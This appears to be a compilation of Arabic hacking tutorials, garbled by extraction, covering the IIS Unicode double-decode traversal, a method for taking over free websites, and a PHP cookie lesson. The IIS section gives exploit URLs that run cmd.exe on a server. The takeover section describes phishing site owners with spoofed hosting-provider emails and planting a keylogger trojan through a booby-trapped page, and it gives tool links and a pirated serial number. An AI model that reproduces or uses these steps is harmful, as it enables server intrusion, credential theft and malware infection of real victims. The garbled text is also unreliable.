‫بالتحديد هذا الفولدر يسمى الفولدر التنفيذى اى ‪( executable directory‬‬ ‫و طبعا هذا الفولدر ليس له اسم ثابت هذا فقط مثال و لكن يمكن ان يكون له اسماء كثيره على الملقم ‪ iis‬و‬ ‫ملحوظه هامه‪ ::‬ل يوجد على كل ملقم ‪ iis‬هذا الفولدرالتنفيذى اى ‪executable directory‬‬ ‫و اعتقد ان الصديق بلك هنتر و الخ هكس قد ذكرو معظم اسامى هذه الديريكتورز فى شرحهم )فأنا اريد ان‬ ‫اربط الدروس مع بعض حتى تكون سلسله متكامله (‬ ‫* ‪ <=== winnt/system32/cmd. traceroute‬الخ اعتقد انها فكره لم يلحظها بعضنا (‬ ‫* ؟‪ -‬علمه الستفهام تخيلو حتى علمه الستفهام فى هذه الثغره لها دور فهذه العلمه تعنى الحاله التى ينفذ‬ ‫بها المر )طبعا مش فاهم يعنى ايه ( و ل يهمك تعالى معى افهمك يعنى ايه علمه الستفهام تعنى كلمه‬ ‫‪ argument‬و هذه الكلمه هى التى تعنى الحاله التى سينفذ بها المر اى انه امر مثل ينفذ فى لحظه ثم‬ ‫ينتهى مثل ‪ copy‬مثل ام انه امر مثل ينفذ و لكن يستمر مفعوله و حقيقه ان طبعا معظم الوامر التى‬ ‫نستخدمها هى الوامر العاديه و هى من نوع ‪ argument /c‬و هذا ال ‪ c/‬يعنى ان المر ينفذ فى لحظه ثم‬ ‫ينتهى‬ ‫تعالى افهمك اكثر ‪ ::‬لو عندك ويندوز ‪ 2000‬افتح ال ‪ cmd‬بتاعك و اكتب هذا )‪ (?/ cmd‬و اضغط‬ ‫انتر ‪...‬سيظهر لك كلم كثير جداا و لكنى اخترت منه جزء بسيط فقط للتوضيح و انت عليك الباقى‬ ‫شوف ايه الى راح يظهر لك ‪::‬‬ ‫‪Starts a new instance of the Windows 2000 command interpreter‬‬ ‫‪[CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF‬‬ ‫]]‪[S] [/C | /K] string/‬‬ ‫‪C Carries out the command specified by string and then terminates/‬‬ ‫‪K Carries out the command specified by string but remains/‬‬ ‫‪(S Modifies the treatment of string after /C or /K (see below /‬‬ ‫‪Q Turns echo off/‬‬ ‫‪(D Disable execution of AutoRun commands from registry (see below /‬‬ ‫هذا جزء بسيط جداا مما راح يظهر لك و لكن تعالى نشوف هذا الجزء ايه معناه اول يقولك ‪::‬‬ ‫‪ Starts a new instance of the Windows 2000 command interpreter‬و هذه‬ ‫الجمله تعنى بالعربيه بدايه حاله جديده من مترجم ال ويندوز ‪ 2000‬و هذا طبعا وضح لنا ان كل ‪cmd‬‬ ‫يمكن ان يتخكم صاحبه فى حالته حسب ما يفتح او يغلق ال ‪ ..exe‬و طبعا هذا هو ال ‪ cmd‬الذى يسمح لنا بأدراج سطور‬ ‫الوامر التى نريد تنفيذها )و على فكره ممكن تستعمل هذا ال ‪ cmd‬فى استخدام اوامر مثل ‪ ping‬و‬ ‫‪ netstat‬و ‪. arguments‬و بعدها يظهر لنا‬ ‫‪ arguments‬كثيره و منها الذى نستعمله دائما فى الثغره و هو ‪ c/‬شوفو كده ما المكتوب امامه ‪::‬‬ ‫‪ Carries out the command specified by string and then terminates‬و هذا‬ ‫الكلم معناه انه ينفذ المر الموجود فى سطر الوامر ثم ينتهى و طبعا هذا للوامر العاديه التى نعرفها‬ ‫تعالو نشوف السطر الى تحتيه ‪::‬سوف نجد انه يتكلم عن ‪ argument‬ل نراه فى ثغره اليونى كود و هو ال‬ ‫‪ k/‬شوفو ايه مكتوب امامه‪::‬‬ ‫‪ Carries out the command specified by string but remains‬و طبعا معناه انه ينفذ‬ ‫الوامر الموجوده فى السطر و لكن يستمر مفعولها )ما زلت ابحث عن اوامر مثل هذه و لكن هذا ما هو‬ ‫مكتوب امامى و لكن تقدر تقول انها الوامر التى تأخذ فتره طويله حبتين مثل ‪ ping‬مثل (‬ ‫و مثل هناك ‪ argument‬أخر مثل ‪ Q/‬و هذا نستخدمه فى اغلق تفعيل امر ‪ echo‬كما هو واضح فى‬ ‫المثال فوق‬ ‫و هناك الكثير من هذه ال ‪ arguments‬و طبعا منها ما هو اساسى ل يمكنك التحكم فيه )يعنى فتحه او‬ ‫غلقه مثل ال ‪ c/‬و ال ‪ ( k/‬و هناك اخرين يمكنك ان تجعلهم ‪ on‬او ‪ off‬و بهذا تكون انت تتحكم بحاله ال‬ ‫‪ cmd‬خاصتك )ياريت تنفذ المر و تقرأ المكتوب لنك راح تلقى تفاصيل الفتح و الغلق بالتفصيل ( و‬ ‫اصبروا على قليل حتى انتهى من المتحان الول فى ‪ MCSE‬فى خلل اسبوعين ان شاء ال تعالى و بعد‬ ‫ذلك نعود اكثر قوه و نشرح لكم هذه النقطه بالتفصيل ان شاء ال بس اصبرو شوى‬ ‫‪141‬‬ .

../ping.%./‬‬ ‫ولكن ما الذى نحاول ان نفعله بهذه التحليلت الغريبه ؟‬ ‫فنحن بذلك نحاول ان نحسن و نلعب فى مسارات الديريكتورز و لكن للسف ل يمكنك تغيير او اللعب فى‬ ‫الديريكتورز لن ال ‪ iis‬مزود بخاصيه عمل ‪ check‬على مثل هذه الديكودز و منعها من التنفيذ و هنا يقع‬ ‫اصل ثغره اليونى كود و هو التحليل لمرتين او لكثر من مره فهمتم قصدى الن اى ان ال ‪ iis‬مزود فعل‬ ‫بخاصيه ال ‪ check‬على هذه الديكودز و لكن انت تضع الثغره و بها اكثر من تحليل واحد لنفس اسم الموقع‬ ‫و لذلك يقوم ال ‪ iis‬بوظيفته المعتاده و هى ال ‪ check‬و المنع على الديكود الول و يظهر له ان كل شئ‬ ‫بخير و انه يسيطر على الموقف خخخخخخخخ و لكن الحقسقه انه يعمل ال ‪ check‬مره واحده فتكون‬ ‫النتيجه ان الديكود الثانى ينجح تماما فى محاوله اللعب فى الديريكتورز و بالتالى يكون نتيجه الديكود الثانى‬ ‫هو ان يرجع الى اصله اى ‪( slash) /‬‬ ‫و تعالو ندخل و نتعمق اكثر فى تفاصيل الديكود للثغره بعد ان عرفنا فكرتها ‪::‬‬ ‫شوفو فيه ماده اسمها ‪ computer logic‬و الماده دى راح درس فيها شئ يسمى ‪HexaDecimal‬‬ ‫‪ Values‬و هذه ال ‪ values‬هى اساس الديكود الذى نفعله فى الثغره اى ان كل حرف صحيح او حركه‬ ‫مثل ‪ /‬فى الكمبيوتر لها ما يسمى بال ‪ hex value‬تعالى اوضحلك اكثر ‪::‬‬ ‫مثل‪ 20% :‬تعنى مسافه )‪(space‬‬ ‫هذا مثال بسيط و اعتقد انك فهمت الن كلمى و طبعا يوجد جدول لهذه ال ‪ hex values‬المساويه‬ ‫للحروف و الحركات العاديه فى الكمبيوتر ‪ .‬‬ ‫**و نأتى الن لهم نقطه فى الثغره و هى اساسا سبب الثغره كما ذكرنا فى اول الكلم )هو ان سبب الثغره‬ ‫يكون حل شفره العنوان اكثر من مره (و هذا ما نطلق عليه ال ‪ decode‬و انا شخصيا افصل الديكودز على‬ ‫انه تحليل حتى نصل لبسط الحل كما فى الرياضيات يعنى ‪ simplyfiey‬اى تبسيط و فك المعادله تعالو‬ ‫خلينا نفهمكم هذا على الثغره نفسها ‪::‬‬ ‫‪ %255c.exe+PRINT‬بل من ‪ cmd...%255c.‬اذن اعتقد انك ادركت تماما الن انك ترسل ‪hex values‬‬ ‫عوضا عن الحروف و الحركات العاديه الى السرفر و هذا بالضبط ما نسميه التحليل او فك الشفره او ال‬ ‫‪decode‬‬ ‫تعالى نخش فى تفاصيل الثغره اكثر و سنأخذ الحركه التى نشرح عليها هى ال ‪ ( slash) /‬حيث انها من‬ ‫اساسيات الديكود فى هذه الثغره ‪::‬‬ ‫شوف فى جدول ال ‪ hex value‬راح نجد ان ال ‪ .exe‬او الحاله التى سينفذ عليها‬ ‫ال ‪ cmd‬المر اما علمه ال ‪ +‬التى بجانب ال ‪ c/‬فهى بمقام المسافه بين الكلمتين فى الثغره و لكن ل يمكننا‬ ‫اسبدالها بمسافه عاديه و بعدها يكون المر الذى يحمله سطر الوامر لينفده ثم علمه ‪ +‬ثانيه و بعدها اسم‬ ‫الدرايف الذى تعرض محتوياته على الشاشه حاليا ‪.‬‬ ‫تعالو نروح لنقطه سهله و بسيطه جدااا فى الثغره ‪.+c/‬و بالتالى كما عرفنا فوق انا ‪ c/‬هى ال ‪ argument‬لل ‪ cmd. 5c% = /‬طبعا هذا هو الديكود الول الذى ستفكر الن‬ ‫فى انك تحذف ال ‪ /‬و تضع بدل منها هذا ال ‪ value‬فتنجح الثغره و لكن انا اقول لك هذا خطأ لن هذا هو‬ ‫الديقود الول و انا ذكرت ان الديكود يحدث مرتين او ممكن اكثر يعنى لو وضعت هذا الديكود الول فستجد ان‬ ‫ال ‪ iis‬لديه القدره على ان يمسك هذا الديكود و يمكنعه من التنفيذ و لذلك علينا ان نحلل هذا ال ‪ value‬حتى‬ ‫يتم الديكود التانى فتنجح الثغره‬ ‫و بالنظر الى جدول ال ‪ hexadecimal values‬شوف نجد هذا ‪::‬‬ ‫‪%25 = %‬‬ ‫‪142‬‬ .‬انت تشغل ال ‪ cmd..../‬هذا هو الديكود اى التحليل للصل ‪..exe?/c‬و بهذا تكون قد شغلت الفايل الذى تريده‬ ‫)‪.exe‬لنك تريد ان تتحكم بالموقع و‬ ‫تغير الندكس و الخ و و لكن تعالى مثل نشغل اى ملف تانى ياترى كيف نشغله ؟‬ ‫انا راح اقلك كيف ‪::‬كل ما عليك فعله هو ان تقوم بوضع اسم الفايل الذى تريد تشغيله بهذا الشكل‬ ‫‪ Ping.exe+PRINT‬‬ ‫* ‪ .‫اعتقد انك الن فهمت ما هى ال ‪ arguments‬و ما فائده ‪ c/‬التى تكتبها فى الثغره و انا متأكد انك ل تعرف‬ ‫معناها ‪.%5c. ( enjoy this‬حيث تصبح الثغره بهذا الشكل ‪::‬‬ ‫‪http://issserver/scripts/..

WIN2000 RESOURCE KIT‬‬ ‫انتهى‪،،،‬‬ ‫‪143‬‬ ...%5c.%.‫‪%35 = 5‬‬ ‫‪c = %63‬‬ ‫و بالتالى نجد انفسنا قد خدعنا ال ‪ iis checker‬بأننا حللنا ال شفره مرتين و بالتالى فسنحصل فى المقابل‬ ‫على الصل و هو ‪ /‬و بالتالى تكون قد نجحت الثغره ‪. checker‬‬ ‫و فى النهايه بعد فهمنا للثغره و اساسها هيا تعالو نطبقها مع بعض‬ ‫سوف نضع الثغره فى هذا الشكل ‪::‬‬ ‫‪http://iisserver/scripts/.‬‬ ‫فهمتم الن شباب معنى ديكود العنوان مرتين و فهمتم اساس الثغره و الديكود مرتين ليس معناه تكرار‬ ‫التحليل الول مرتين و لكن معناه تحليل و فك التحليل الول اى ‪ simplify‬الى ابسط و اطول صوره ممكنه‬ ‫فى نفس الوقت‬ ‫و عشان توضح اكثر معك راح احطلك كيف التركيبه الصح للتحليل ‪::‬‬ ‫‪%255c %25 = % 5 = 5 c = c = %5c‬‬ ‫‪%%35c % = % %35 = 5 c = c = %5c‬‬ ‫‪c = %5c = %63 5 = %35 % = % %%35%63‬‬ ‫‪c = %5c = %63 5 = %35 % = %25 %25%35%63‬‬ ‫ثم ‪/= 5c% :‬‬ ‫ارائيتم التحليل طبعا فى الخر يجب ان يساوى الديكود الصل و هو كما واضح فى مثالنا كل التحليلت تساوى‬ ‫‪ 5c%‬و كما ذكرنا ‪ / = 5c%‬و لكننا حللنا هذا الرمز الى اطول و ابسط تحليل حتى نخدع ال ‪iis‬‬ ‫‪.xe?/c+dir+c:+/s‬‬ ‫و ستدخلون على الموقع بنجاح و لكن اكيد تلحظون شئ جديد قد زاد على الثغره و هذا الشى هو ‪s/+‬‬ ‫هذا الرمز‬ ‫و عندما تدمج هذا الرمز مع الثغره كما فى المثال السابق سوف تأتيك لسته بكل فايل كبير و صغير فى‬ ‫كمبيوتر الويب سرفر‬ ‫و ال تعبت فى هذا الدرس و تعبت فى قرائه المعلومات و تجميعها عن اليونى كود حتى اصل لهذا الشكل‬ ‫الخوه و ان شاء ال انتظرو موضوعى القادم بعدما اكون انهيت امتحانى الول فى ‪) MCSE‬ادعولى‬ ‫بالنجاح ( و سيكون عباره عن تلخيص للتعامل مع شبكات ويندوز ‪ 2000‬و كيفيه اختراقها و فائده ال‬ ‫‪...

0...‬‬ ‫انتهى‪،،،‬‬ ‫‪144‬‬ .0.‬‬ ‫‪ *4‬قم بوضع علمة صح على الخيار الول “‪.‬‬ ‫اما عن كيفية التدرب على الجهاز أي اختراقه فقم بالتالي‪:‬ـ‬ ‫قم بوضع الموقع في مجلد ‪wwwroot‬الموجود داخل مجلد ‪ Inetpub‬طبعا هتدخل عليه بعد ما تشغل‬ ‫السيرفر ‪ IIS‬عن طريق‬ ‫‪/http://127.”IIS‬‬ ‫هذا بالنسبة لكيفية تنزيل السيرفر‪..‬‬ ‫كثر الكلم عن إختراق المواقع بأنواعه واليوم عندي شرح عن الختراق عن طريق اليونيكود أو بالصح‬ ‫تطبيق عملي على كيفية الختراق عن طريق اليونيكود وهذا النوع يعتبر للمبتدئين وهو الذي بإذن ال‬ ‫سيوصلهم إلى طريق الحتراف ‪...‬‬ ‫‪ *3‬قم بالنقر على زر " إضافة إزالة مكونات ويندوز "‪.1‬‬ ‫وقم بتطبيق المهارات التي تعلمتها في اختراق المواقع المصابة باليونيكود‪.....‬‬ ‫‪ *2‬قم بالنقر على إضافة إزالة برامج‪.‬‬ ‫لكي تتدرب على إختراق المواقع قم بتركيب نظام ويندوز ‪ 2000‬على جهازك ‪ .‬وفي نفس السيدي تبع النظام‬ ‫تقوم بإضافة سيرفر ‪ IIS‬وذلك عن طريق ‪:‬‬ ‫‪ *1‬قم بالذهاب إلى لوحة التحكم‪.‫" تدريب على عملية الختراق بواسطة اليونيكود "‬ ‫>ةةةةةة‪ :‬ةةةة ةةة <‬ ‫بسم ال الرحمن الرحيم‪.01‬‬ ‫وليجاد الثغرة في الجهاز والتدرب عليها قم بتشغيل برنامج عمران سكان أو أي برنامج اخر للفحص عن‬ ‫الثغرات تبع اليونيكود وقم بوضع العنوان تبعك الي هو ‪/http://127..0..‬‬ ‫سيكون التطبيق على جهازك وهو مثل الموقع أو السيرفر وتقوم بتطبيق الدرس كما وأنك على موقع‬ ‫مصاب‪.‬‬ ‫******************‬ ‫بسم ال نبدأ‪..

.‬الخ وتستطيع التوصل له ببعض الطرق=‪-‬‬ ‫ثالثا=‪-‬‬ ‫عليك اول ايجاد الكواد الزمه لسرقه الكوكيز من المتصفح=‪-‬‬ ‫لنــبدأ الشرح‬ ‫النقطه الولى لمعرفه نوعيه اصدار المتصفح لصاحب الموقع سهله جدا فكل موقع يصمم على حسب نوعيه‬ ‫المتصفح الخاص بصاحبه ويكت لنا في نهايه الموقع يفضل تصفحه بدقه معينه ويعطيك اصدار الكسبلور‬ ‫المناسب لتصفح الموقع=المناسب لتصميمه=نفس الصدار الخاص بهوهذه اسهل نقطه واهم شئ فيها‬ ‫لختراق المواقع المجانيه‬ ‫واما بالنسبه للوصول الى الضحيه فهناك عده طرق ويجب ان يكون معاك اكواد الهتمل الخاصه بسرقه‬ ‫الكوكيز))ساضعها هنا لحقا((والن بعدما حصلت على هذه الكواد تضعها في صفحه وتحاول جذب الضحيه‬ ‫للتوجه لها وهناك عده طرق‬ ‫‪-1‬تاخذ عنوان ماسنجر او ايميله من اي مكان في الموقع اذا وضعه وتحبه وتصير موثوق‬ ‫عنده))هههههههه حب مصلحه((وتعطيه صفحتك الى حطيت فيها الكوكيز او ترسل له ملف سارق الباسوورد‬ ‫‪145‬‬ .‫" شرح مفصل لكيفية اختراق المواقع المجانية "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪:‬‬ ‫‪<De\/iL Ni9hT‬‬ ‫=سهوله اختراق المواقع المجانيه=‪-‬‬‫نعم‪..‬ايميل‪.‬ان اختراقها اسهل مماتتصور‬ ‫الساسيات لختراق كل شي هو الكوكيز لنه يحتوي على جميع المعلومات))الموقع‪.‬الخ((‬ ‫ولكن يجب ان تعرف عده نقاط مهمه لختراق اي موقع مجاني‬ ‫اول=‪-‬‬ ‫يجب عليك معرفه نوعيه اصدار المتصفح‬ ‫ثانيا=‪-‬‬ ‫عليك معرفه بعض بيانات صاحب الموقع مثل اليميل‪....

s5‬الخ‬ ‫وتسجل عندهم وسيرسلون لك البيانات ويكون لهم تصميم خاص جدا وانت عليك بسرقه نفس التصميم‬ ‫وتغيير محتوى الرساله))طبعا بالعنقليزي((وارسال رساله منه تتطلب منه فتح موقع))موقعك الى فيه‬ ‫الكود((مثل لعمل التحديثات اواي شئ اخروهو لن يشك اذا رأى تصميم رسالتك وطريقتك نفس طريقه موقع‬ ‫الشركه وسيفتح الموقع حال‬ ‫واذا لم يضع ايميله فهناك طريقه وهى انك مثل تدخل سجل الزوار عندهوتكتب شي يقهره و يجذبه بقوه يعني‬ ‫مثل تقول له تصميم موقعك مسروق حرفيا من هذا الموقع وتعطيه اللنك))وهو للمره المليون اقلكم الموقع‬ ‫الى فيه الكود((او اي طريقه اخرى من ذكائكواذا لم تجد ايميله او سجل زوار فهناك عليك اختراق الموقع‬ ‫بالثغرات وهو صعب جدا جدا‬ ‫النقطه الثالثه وهي الكوكيز=‪-‬‬ ‫يطول شرحها عشان كدا بحط شرحه في موضوع تاني مرفق معاه الكواد الخاصه بالمتصفحات مع طريقه‬ ‫التعامل معها لسرقه كوكيز الضحيه وتوصيله الى جهازك‬ ‫طريقه اختراق المواقع المجانيه التى اصحابها لديهم متصفح ‪IE 5 IE 5..name..mikkotech.‫‪-2‬مثل تحدد نوعيه الشركه الى مقدمه الستضافه المجانيه للموقع فمثل اذا كان عنوان الموقع‬ ‫‪/http://www.8m.com‬‬ ‫فهذا معناه ان الموقع مقدم من شركه فري سيرفر ‪FreeServerS‬وتستطيع معرفه النطاق المحدده‬ ‫بالدخول الى المواقع المجانيه وعمل تسجيل وستظهر لك انواع الدوامين المتاحه))‪.5‬‬ ‫هذه هي الطريقه التى تستعملها اذا استطعت الوصول الى صاحب الموقع ))راجع درس "سهوله اختراق‬ ‫المواقع المجانيه"((‬ ‫اول لن نعتمد على الكوكيز في سرقه الباسوورد وسنعتمد على تروجان قوي وخطير يسجل كل شي في‬ ‫الكيبوردوليكشفه النورتون انتي فايروس وهو الذي سنضعه في صفحه ملغومه اول مايفتحها الضحيه ينزل‬ ‫الى جهازه‪..zip‬‬ ‫‪146‬‬ .8m.exe‬‬ ‫والسيريال نمبر‬ ‫‪SN: K100-43-109-0-793218E876A4C9-29‬‬ ‫والبرنامج سهل جدا ول يحتاج لشرح واذا اردتم شرحه كلمونيوالن بعدما جهزت ملف الباتش بهذا البرنامج‬ ‫قم بتحميل برنامج ‪godwill‬وهو البرنامج الخاص للغام الموقع على انترنت اكسبلور ‪ 5‬و ‪))5.5‬هذه هي‬ ‫سر المهنه((ووصلته‬ ‫‪http://www..com/kk2000pro.org/activex/gwpackage.‬‬ ‫اول قم بتحميل برنامج ‪keykey2000‬وهذا البرنامج يسجل كل شي بالكيبورد والشياء الى كنت تعمل بها‬ ‫ويرسلها على اليميل وانا مجربه وليستطيع النورتون الجديد والزرار الثلثه للغاء العمليات النشطه في‬ ‫النظام ايقافه ووصلته‬ ‫‪http://www..thecorpz..

thecorpz.org/html/activesploits.‬‬ ‫‪147‬‬ ..‫====================الشــــرح=====================‬ ‫انا لن اقوم بعمل شرح بالصور وهذا شرح بسيط للبرنامج لنه سهل جدا‬ ‫عندما تفتح البرنامج ستظهر لك لوحه اختار منها‬ ‫‪enter‬في السفل وستظهر لك القائمه والذى يهمنا منها‬ ‫‪Upx‬وهذا لتشفير الباتش))اظننا خرجنا عن موضوعنا((‬ ‫‪Html‬وكل شغلنا هنا لكي نقوم بعمل صفحه ملغومه وعندما نضغط عليه تجي عده اختيارات وانت اختار‬ ‫منها‬ ‫‪General options‬وستظهر لك مربع عرض الصفحات الملغومه وهذا شرح سريع لها‬ ‫‪enter exe file‬ومن هنا تضع الباتش الى سويته بشرط ال يكون حجمه كبير جدا))هل تفيدنا هذه‬ ‫المعلومه في شئ((‬ ‫‪enter html‬لستعراض صفحه من جهازك ثم الغامها وحط علمه صح جانب ‪use default‬‬ ‫‪page‬ليقوم البرنامج بعمل صفحه جديده‬ ‫وفي السفل ‪HTA File Name‬وهنا تضع اسم الصفحه وبعد النتهاء من ذلك نختار كلمه ‪Done‬ليقوم‬ ‫البرنامج بعمل الصفحه))وسيكون مكانها في نفس مجلد البرنامج((‬ ‫وارجو ان يكون الشرح واضحا‬ ‫واذا واجهت مشكله مع البرنامج توجه الى هذا الموقع‬ ‫‪http://www.html‬‬ ‫===================نهايه الشـــرح====================‬ ‫وبعدما تقوم بوضع الصفحه الملغومه في النت واعطائها للضحيه بالطرق التى شرحتها سابقا سينزل‬ ‫التروجان على جهازهعندما يقوم بفتح موقعك الملغوم ولم يبقى لك الن انت تنتظر في بريدك الى حطيته في‬ ‫التروجان المعلومات عن الضحيه مثل))الموقع واليميل‪.‬الخ((وهذه الطريقه تنفع ايضا لسرقه الشتراكات‬ ‫واساميه في المنتديات وايميله‪.

‬‬ ‫وتختلف المعلومات التي تخزن ضمن ملفات الكوكيز من موقع لخر ‪ ،‬ولكن ليس بإمكان هذه المواقع‬ ‫استرجاع أي معلومات إضافية عنك أو عن جهازك ‪ ،‬باستثناء تلك المعلومات المخزنة في الملف النصي‬ ‫الخاص بها ‪ ،‬والتي تم إرسالها من قبل الموقع ‪ ،‬وبذلك ل تستطيع هذه المواقع الطلع على مضمون ملفات‬ ‫الكوكيز الخرى ‪ ،‬أو أي ملفات خاصة على جهازك ‪.‬‬ ‫وبإمكان الموقع تغيير المعلومات الموجودة ضمن ملفات الكوكيز أو إضافة معلومات جديدة كلما قمت بزيارة‬ ‫الموقع ‪ .‬‬ ‫معلومات عامة‬ ‫ ما هي ملفات الكوكيز ؟‬‫ملفات الكوكيز عبارة عن ملفات نصية ‪ ،‬تقوم المواقع التي تزورها بإيداعها على القرص الصلب في‬ ‫جهازك ‪ ،‬وتحتوي هذه الملفات النصية على معلومات تتيح للموقع الذي أودعها أن يسترجعها عند الحاجة ‪،‬‬ ‫أي عند زيارتك المقبلة للموقع ‪.‬‬ ‫‪ -3‬قراءة الكعكات من جهاز العميل ‪..‬أما بعض ملفات الكوكيز التي تعرض‬ ‫‪148‬‬ .‫انتهى‪،،،‬‬ ‫" درس مفصل عن الكوكيز "‬ ‫>ةةةةة ةة ةةةةةةة ةةةةة ةةةةةة<‬ ‫>ةةةةةة‪:‬‬ ‫‪<Linux Girl‬‬ ‫مقدمة‬ ‫تعد الكعكات ) الـ ‪ ( cookies‬من الوسائل المفيدة في انشاء مواقع اكثر تفاعلية ‪ ،‬فبواسطتها ستتمكن من‬ ‫معرفة هل قام المتصفح بزيارة موقعك من قبل ام ل ‪.‬‬ ‫ كيف يتم إيداع ملفات الكوكيز على جهازك ؟‬‫يرسل المتصفح ‪ ،‬عند إدخالك عنوان موقع في شريط العناوين ‪ ،‬طلبًا إلى الموقع الذي حددته ‪ ،‬متضمنًا‬ ‫عنوان ‪ IP‬الخاص به ‪ ،‬ونوع المتصفح الذي تستخدمه ‪ ،‬ونظام التشغيل الذي يدير جهازك ‪ .‬‬ ‫في هذا الدرس سنتعرف على الكعكات و كيف يمكننا استخدامها ‪.‬‬ ‫اقسام الدرس ‪:‬‬ ‫‪ -1‬معلومات عامة ‪..‬‬ ‫‪ -4‬تطبيق ‪ :‬تخصيص لون الخلفية ‪..‬تخّزن هذه‬ ‫المعلومات في ملفات خاصة بالمزود ‪ ، Log Files‬ول علقة للكوكيز بالمعلومات التي يتم إرسالها ‪ .‬وفي‬ ‫الوقت ذاته يبحث المتصفح عن ملفات كوكيز ‪ ،‬التي تخص الموقع المطلوب ‪ ،‬فإذا وجدها يتم إرسالها مع‬ ‫طلب مشاهدة الموقع ‪ ،‬وإذا لم توجد ‪ ،‬فإن الموقع سيدرك أن هذه زيارتك الولى إليه ‪ ،‬فيقوم بإرسال ملفات‬ ‫الكوكيز إلى جهازك لتخزن عليه ‪.‬يتم تخزين بعض ملفات الكوكيز في الذاكرة فقط ‪ ،‬بحيث يجري حذفها مباشرة عند إغلقك‬ ‫المتصفح ‪ ،‬ولكن معظمها وتسمى "ملفات الكوكيز المثابرة"‪ ،‬يتم تخزينها لفترة محددة على القرص الصلب‬ ‫لحين انتهاء صلحيتها وقد تدوم صلحيتها مدة أشهر أو حتى سنوات ‪ .‬‬ ‫‪ -2‬زراعة الكعكات على جهاز العميل ‪.

‬‬ ‫ مكونات ملف الكوكيز ‪:‬‬‫يتكون عادة من عدة اجزاء هي اسم الملف ‪ ،‬قيمته ‪ ،‬تاريخ انتهاء مفعوله ‪ ،‬الموقع المالك له ‪...‬‬ ‫‪ <-‬ثالثًا ‪ :‬إذا لم تحدد وقتا فان الكعكة تخزن في ذاكرة المتصفح و تفقد حالما يغلق المستخدم الموقع ‪..‬فقط قيم نصية ‪ ..'http://www.‬ل يمكنك وضع مصفوفة كقيمة و هذا أامر مهم ‪ ....‬و هنا ثلث حالت ‪:‬‬ ‫‪ <-‬أوًل ‪ :‬أن يكون الوقت المعطى كمدخل اكثر من الوقت الحالي على جهاز العميل و عندها تخزن الكعكة‬‫على جهاز العميل و تحذف عند انقضاء المدة ‪.....‬وتعود المعلومات المخزنة‬ ‫في ملفات الكوكيز إلى مزودات الموقع الذي أصدرها فقط ‪ ،‬وقد تعمم بعض الشركات الكبرى ملفات الكوكيز‬ ‫التي تصدرها على جميع مزوداتها ‪ ،‬لتنسيق المعلومات المتضمنة ‪ ،‬ولكي ل تصدر كل من مزوداتها ملفات‬ ‫كوكيز للمستخدم ذاته ‪ ،‬عند زيارته لصفحات مختلفة في الموقع ‪.‬‬‫مثال ‪:‬‬ ‫‪:code‬‬ ‫>?‬ ‫‪.palhackerz.‬؟ كيف ؟ ‪ :‬استخدم الدالة ‪ serialize‬لتحويل اي متغير في بي اتش‬ ‫بي الى شكل نصي و من ثم استخدم ‪ unserialize‬لعادته الى الشكل الطبيعي ‪.‬‬ ‫‪ <-‬ثانيًا ‪ :‬أن يكون الوقت المعطى كمدخل اقل من الوقت على جهاز العميل و عندها ل يقوم المتصفح على‬‫جهاز العميل بتخزينها و اذا وجدت كعكة بنفس السم فانه يحذفها حتى لو لم تنتهي المدة ‪.‬‬ ‫‪ : value‬القيمة ‪ .com/'... string domain [..time()+3600‬‬ ‫?<‬ ‫من الدوال المفيدة دالة ‪ time‬و التي ترجع الوقت الحالي على شكل عدد الثواني من بداية عصر اليونكس )‬ ‫‪149‬‬ .‫تاريخ صلحية لتاريخ سابق ‪ ،‬فإنها ُتحذف مباشرة ول ُتخّزن على قرصك الصلب ‪ . string value [.(setcookie('site'.‬‬ ‫زراعة الكعكات على جهاز العميل‬ ‫أول ‪ :‬كيف تزرع ملفات الكعكات ‪:‬‬ ‫يتم ذلك باستخدام الدالة ‪ setcookie‬و تعريفها بالشكل التالي ‪:‬‬ ‫‪:code‬‬ ‫‪boolean setcookie ( string name [.‬لكن انتبه بامكانك‬ ‫وضع مصفوفة لكن بطريقة اخرى ‪ .‬‬ ‫تهمنا المدخلت الثلث الولى و هي ‪:‬‬ ‫‪ : name‬اي اسم الكعكة ‪ .‬‬ ‫‪ : expire‬اي عدد الثواني من بدية عصر اليونكس ) ‪ 1‬يناير ‪ ( 1970‬و التي بعدها سيقوم المتصفح على‬ ‫جهاز المستخدم بحذف الكعكة ‪ . int expire‬‬ ‫]‪([[[[[string path [. int secure .‬فبامكانك ارسال اكثر من كعكة الى متصفح واحد و عندها يصبح السم هو‬ ‫الطريقة الوحيدة للتمييز ‪.

‬‬ ‫ملحظة مهمة ‪:‬‬ ‫يجب ان تستدعي الدالة ‪ setcookie‬قبل أن ترسل اي شيء الى المتصفح ‪ .com : the best islamic forum‬‬ ‫?<‬ ‫>‪<body/‬‬ ‫>‪<html/‬‬ ‫بل لو كان هنالك مجرد سطر فارغ قبل علمة البداية ?< فلن تعمل الدالة ‪.time()+20000‬‬ ‫‪.time()+20000‬‬ ‫?<‬ ‫>‪<html‬‬ ‫‪150‬‬ ."echo " Alfjr.com'.(setcookie('site'.''.'palhackerz.com'.time()-360000‬‬ ‫?<‬ ‫ملحظات ‪:‬‬ ‫‪ -1‬عندما تحدد زمنا ماضيًا اجعله قيمة كبيرة لكي تتفادى فارق التوقيت بين الخادم و العميل ‪.‬فمثل الكود التالي لن ينجح ‪:‬‬ ‫‪:code‬‬ ‫>‪<html‬‬ ‫>‪<body‬‬ ‫>?‬ ‫‪. (1970‬‬ ‫ثانيا كيف تحذف او تعدل كعكة‪:‬‬ ‫لكي تحذف كعكة عليك أن ترسل كعكة بنفس السم و خالية القيمة و ذات وقت اقل من الوقت على جهاز‬ ‫المستخدم‬ ‫مثال ‪:‬‬ ‫‪:code‬‬ ‫>?‬ ‫‪.‫‪ 1‬يناير ‪. setcookie‬‬ ‫المثال السابق كان من الممكن ان يكون ‪:‬‬ ‫‪:code‬‬ ‫>? ‪...‬‬ ‫‪ -2‬لكي تعدل أي كعكة عليك حذفها و إرسالها من جديد ‪..'palhackerz.(setcookie('site'.(setcookie('site'.

